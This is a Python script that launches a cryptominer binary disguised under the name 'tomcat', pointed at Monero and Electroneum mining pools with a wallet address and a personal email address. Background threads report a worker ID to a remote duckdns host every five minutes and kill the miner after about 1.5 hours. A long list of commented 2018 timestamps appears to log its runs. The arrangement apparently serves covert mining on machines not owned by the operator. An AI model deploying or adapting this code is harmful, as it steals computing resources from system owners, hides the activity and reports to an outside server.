import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:15:08.989400
#2018-02-17 17:04:06.378067
#2018-02-17 18:52:06.842630
#2018-02-17 20:42:01.519199
#2018-02-17 22:29:05.017634
#2018-02-18 00:12:01.641037
#2018-02-18 02:04:02.026141
#2018-02-18 03:50:08.601350
#2018-02-18 05:38:06.927924
#2018-02-18 07:32:08.543736
#2018-02-18 09:20:03.780982
#2018-02-18 11:06:05.630711
#2018-02-18 12:53:04.205743
#2018-02-18 14:41:01.292154
#2018-02-18 16:30:09.302579
#2018-02-18 18:19:04.657122
#2018-02-18 20:05:05.524063
#2018-02-18 21:52:01.736681
#2018-02-18 23:41:04.548233
#2018-02-19 01:27:05.889013
#2018-02-19 03:16:05.505754
#2018-02-19 05:01:02.145582
#2018-02-19 06:45:08.027028
#2018-02-19 08:36:07.337412
#2018-02-19 10:25:07.340096
#2018-02-19 12:13:01.532848
#2018-02-19 13:59:07.404213
#2018-02-19 15:49:07.032852
#2018-02-19 17:36:06.075385
#2018-02-19 19:23:07.815538
#2018-02-19 21:09:06.184235
#2018-02-19 22:57:01.973644
#2018-02-20 00:39:04.981926
#2018-02-20 02:28:01.610396
#2018-02-20 04:18:05.414713
#2018-02-20 06:02:06.730835
#2018-02-20 07:47:03.236767
#2018-02-20 09:32:07.115216
#2018-02-20 11:16:07.738560
#2018-02-20 13:03:01.526758
#2018-02-20 14:46:08.914284
#2018-02-20 16:35:10.226875
#2018-02-20 18:21:07.990667
#2018-02-20 20:13:01.358107
#2018-02-20 22:01:06.712703
#2018-02-20 23:43:01.404448
#2018-02-21 01:27:06.404801
#2018-02-21 03:16:07.596427
#2018-02-21 05:06:01.475035
#2018-02-21 06:53:04.646601
#2018-02-21 08:39:03.738980
#2018-02-21 10:25:04.710944
#2018-02-21 12:12:03.118584
#2018-02-21 14:01:01.348567
#2018-02-21 15:45:10.200589
#2018-02-21 17:37:01.268308
#2018-02-21 19:22:10.590703
#2018-02-21 21:10:07.080259
#2018-02-21 22:56:05.658898
#2018-02-22 00:44:05.074419
#2018-02-22 02:33:01.530261
#2018-02-22 04:19:01.225243
#2018-02-22 06:04:07.385802
#2018-02-22 07:50:07.798341
#2018-02-22 09:38:06.651057
#2018-02-22 11:25:07.567920
#2018-02-22 13:09:07.033581
#2018-02-22 14:57:08.509744
#2018-02-22 16:42:08.741205
#2018-02-22 18:28:04.337427
#2018-02-22 20:21:07.215966
#2018-02-22 22:06:06.714907
#2018-02-22 23:52:04.388049
#2018-02-23 01:42:01.684632
#2018-02-23 03:28:07.384996
#2018-02-23 05:15:03.979812
#2018-02-23 07:02:04.489760
#2018-02-23 08:50:02.048335
#2018-02-23 11:10:11.816002
#2018-02-23 13:04:01.298620
#2018-02-23 14:48:05.827972
#2018-02-23 16:37:01.948653
#2018-02-23 18:23:04.625001
#2018-02-23 20:07:04.866344
#2018-02-23 21:57:05.873870
#2018-02-23 23:45:01.588002
#2018-02-24 01:37:01.880723
#2018-02-24 03:26:05.230839
#2018-02-24 05:11:05.608295
#2018-02-24 06:59:06.889234
#2018-02-24 08:49:01.176315
#2018-02-24 10:49:05.185479
#2018-02-24 12:36:05.373524
#2018-02-24 14:25:07.400252
#2018-02-24 16:13:06.838147
#2018-02-24 18:07:06.289697
#2018-02-24 19:53:04.494726
#2018-02-24 21:37:01.638966
#2018-02-25 01:52:07.142457
#2018-02-25 04:58:06.899436
#2018-02-25 09:36:01.245559